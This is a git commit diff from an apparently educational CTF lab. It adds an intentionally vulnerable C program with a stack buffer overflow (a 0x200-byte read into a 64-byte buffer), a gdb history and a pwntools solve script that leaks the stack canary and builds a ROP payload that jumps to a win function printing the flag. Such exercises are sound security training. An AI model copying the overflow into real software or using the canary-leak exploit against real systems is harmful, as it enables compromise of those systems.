Second CTFs part

2026-05-10 20:42:33 +02:00
parent 5635246581
commit 9f240eba3b
87 changed files with 404506 additions and 0 deletions
--- a/lab1_2_recap/01_parrot_cage/.gdb_history
+++ b/lab1_2_recap/01_parrot_cage/.gdb_history
@@ -0,0 +1,14 @@
+r
+quit
+r
+disass vuln
+r
+disass vuln
+b *0x000000000040131b
+r
+quit
+disass vuln
+b *0x00000000004012a9
+r
+n
+disass vuln
--- a/lab1_2_recap/01_parrot_cage/main.c
+++ b/lab1_2_recap/01_parrot_cage/main.c
@@ -0,0 +1,48 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <stdint.h>
+
+__attribute__((noinline))
+void win(void) {
+    char *flag = getenv("FLAG");
+    puts(flag);
+    fflush(stdout);
+    _exit(0);
+}
+
+__attribute__((noinline))
+void vuln(void) {
+    char buf[64];
+
+    puts("=== Polly's Parrot Cage ===\n"
+         "Polly repeats everything you say!\n"
+         "Type a message and Polly will squawk it back.\n"
+         "Say 'bye' when you're done chatting.\n");
+    fflush(stdout);
+
+    for (;;) {
+        ssize_t n = read(STDIN_FILENO, buf, 0x200);
+        if (n < 0) {
+            perror("read");
+            exit(1);
+        }
+        if (n == 0) {
+            break;
+        }
+        if (n >= 3 && buf[0] == 'b' && buf[1] == 'y' && buf[2] == 'e') {
+            break;
+        }
+        puts(buf);
+    }
+}
+
+int main(void) {
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stdin, NULL, _IONBF, 0);
+    vuln();
+    puts("Polly says goodbye! *squawk*");
+    return 0;
+}
--- a/lab1_2_recap/01_parrot_cage/parrot_cage
+++ b/lab1_2_recap/01_parrot_cage/parrot_cage
--- a/lab1_2_recap/01_parrot_cage/solve.py
+++ b/lab1_2_recap/01_parrot_cage/solve.py
@@ -0,0 +1,54 @@
+#!/usr/bin/env python3
+from pwn import *
+
+elf = context.binary = ELF('./parrot_cage', checksec=False)
+
+OFFSET_TO_CANARY = 72
+#OFFSET_TO_RIP = 88
+
+#p = process(elf.path)
+p = remote('offsec.m0lecon.it',13531)
+print(p.recvline())
+print(p.recvline())
+print(p.recvline())
+print(p.recvline())
+#print(p.recvline())
+#print(p.recvuntil(b'chatting\n'))
+#p.send(b"A"*30+b'\x00'+b"B"*30)
+#For the future: the first byte in the canary is \x00, so I need
+# to overwrite it in order to print the canary
+payload = flat(
+    #b'\x00',
+    b"A" * (OFFSET_TO_CANARY+1),
+    #b'\x00',
+    #p64(canary),
+    #b"B"  * 30,
+    #b"B" * ( OFFTSET_TO_RIP - OFFSET_TO_CANARY - 8),
+    #p64(win_addr),
+)
+p.send(payload)
+p.recvline()
+
+#add the missing 00 byte and convert to int
+canary_raw = b'\x00'+p.recvline()[(OFFSET_TO_CANARY+1):OFFSET_TO_CANARY+1+7].strip()
+print(canary_raw)
+canary = int.from_bytes(canary_raw, byteorder='little')
+print(f"Canary:{p64(canary)}")
+payload = flat(
+    b'A'* OFFSET_TO_CANARY,
+    p64(canary),
+    b'B' * 8, #RBP
+    p64(0x000000000040101a), #gadget
+    p64(0x0000000000401236), #win
+)
+p.send(payload)
+p.sendline(b'bye')
+print(p.recvline())
+#print(p.recvline())
+p.interactive()
+#print(b"Recv "+p.recvline())
+#print(p.recvline())
+
+"""p.send(payload)
+p.sendline(b'bye')
+p.interactive()"""